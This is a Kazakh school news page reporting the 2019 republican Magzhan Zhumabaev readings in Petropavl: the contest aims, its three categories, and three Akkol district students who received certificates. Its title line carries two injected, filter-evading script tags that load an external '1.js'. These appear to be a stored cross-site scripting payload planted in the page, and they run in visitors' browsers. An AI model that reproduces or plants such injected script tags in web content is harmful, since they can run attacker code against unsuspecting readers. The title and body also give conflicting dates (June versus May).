2018-2019 оқу жылының 17-18 маусым 5-11 сынып арасындағы республикалық Мағжан оқулары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.06.2019

2018-2019  оқу жылының 17-18 мамыр аралығында Петропавл қаласында 5-11 сынып оқушыларына арналған Республикалық Мағжан оқулары өтті.

Байқау мақсаты – Елбасы Н.Ә. Назарбаевтың Қазақстан халқына Жолдауын, Қазақстан Республикасының "Тілдер туралы" Заңын жүзеге асыру аясында, жалынды ақын Мағжан Жұмабаев мұрасын жас ұрпаққа таныту, олардың азаматтық ұстанымының, ұлттық ой-санасының қалыптасуына ықпал ету.

Байқау шарттары:

Мағжан оқулары үш бағыт бойынша өткізіледі:

1.«Өлең – менің Шолпаным, Айым, Күнім» - Мағжан шығармаларын жатқа оқу конкурсы. Қатысушы өзі жатқа білетін шығармалардың тізімін конкурс басталғанға дейін ұсынуы қажет.

2. «Толқынмен толқын сырласып...» - шығармашылық жұмыс. (Мағжан Жұмабаевтың шығармалары бойынша зерттеу жұмыстары)

3. «Ақын да бір бала ғой айға ұмтылған» - жас дарындар конкурсы. (Өз шығармаларын орындау. Қатысушы өз шығармаларының жинағын алдын ала тапсыруы тиіс).

Байқау қорытындысы нәтижесінде Ақмола облысы Ақкөл ауданынын 3 оқушысы Блатаева Аяна – Минск орта мектебінің 7 сынып оқушысы; Еркешқызы Марфуға – Барап негізгі мектебінің 9 сынып оқушысы;

Нұрман Маржан – Амангелді негізгі мектебінің 8 сынып оқушысы қатысып -  сертификаттар берілді, ал дайындаған мұғалімдері Алғыс хатпен марапатталды.

        Республикалық байқаудың барлық қатысушыларын лайықты жеңістерімен шын жүректен құттықтаймыз, болашақта толағай табыстар мен шығармашылық жетістіктер тілейміз!   

Просмотров: 614


Пікір қосу



Деректерді қолтаңбаға қосу